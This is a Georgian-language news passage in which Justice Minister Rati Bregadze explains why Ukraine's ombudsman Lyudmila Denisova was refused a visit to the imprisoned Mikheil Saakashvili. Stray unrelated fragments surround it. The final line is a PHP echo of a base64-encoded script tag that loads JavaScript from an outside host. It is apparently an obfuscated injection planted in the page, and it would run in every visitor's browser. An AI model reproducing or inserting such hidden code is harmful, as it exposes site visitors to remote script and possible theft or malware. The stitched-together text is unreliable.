celsiusi
ავერსი შნაიდერი
საქართველოს კანონმდებლობით არ არის გათვალისწინებული უკრაინის სახალხო დამცველის შესვლა და არ არის ამის აუცილებლობა, ჩვენ არ გვაქვს ამის ვალდებულება, - ასე უპასუხა იუსტიციის მინისტრმა რატი ბრეგაძემ ჟურნალისტის კითხვის იმის შესახებ, თუ რატომ არ მოხდა უკრაინის სახალხო დამცველის ლუდმილა დენისოვას მიხეილ სააკაშვილთან შეშვება.
 
ამასთან, რატი ბრეგაძის განცხადებით, ლუდმილა დენისოვას პატიმარ მიხეილ სააკაშვილთან არშეშვების მიზეზი ყოფილი პრეზიდენტის ჯანმრთელობის მდგომარეობის დაცვაა.
 
„რაც შეეხება არშესვლის მიზეზს, ჩვენ განვმარტეთ და კიდევ ერთხელ ხაზგასმით ვამბობ, რომ საქართველოს კანონმდებლობით არ არის გათვალისწინებული უკრაინის სახალხო დამცველის შესვლა და არ არის ამის აუცილებლობა, ჩვენ არ გვაქვს ამის ვალდებულება. შესაბამისად, როდესაც პატიმარი იმყოფება სამკურნალო დაწესებულებაში, ვალდებული ვართ, რომ მაქსიმალურად შევეცადოთ მისი ჯანმრთელობის მდგომარეობა იყოს ბოლომდე დაცული და როგორც უკვე მოგახსენეთ, სწორედ ამ მოტივებით ქალბატონი სახალხო დამცველი ჯერჯერობით არ იქნა შეშვებული. ასევე, შემოსულია წერილი საგარეო საქმეთა სამინისტროს მეშვეობით და ბუნებრივია, ჩვენ აუცილებლად დავუბრუნებთ პასუხს. წინა შემთხვევაში, როდესაც დენისოვა იმყოფებოდა და გააკეთა ცალმხრივი განცხადება, ალბათ, კარგი იქნებოდა მაშინ შევხვედრილიყავით, რომ მოესმინა ჩვენი პოზიცია და გათვალისწინებულიყო ორივე მხარის პოზიცია იმიტომ, რომ პირველად, როდესაც ის ბრძანდებოდა მე-12 დაწესებულებაში და გამოვიდა, გააკეთა მხოლოდ ცალმხრივი განცხადება და არ შეგვეკითხა, კითხვაც კი არ დაუსვამს ჩვენთვის იმის შესახებ, სიმართლეს თუ შეესაბამებოდა ის ინფორმაცია, რომელიც მას მიაწოდეს”, - განაცხადა ბრეგაძემ.
913
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");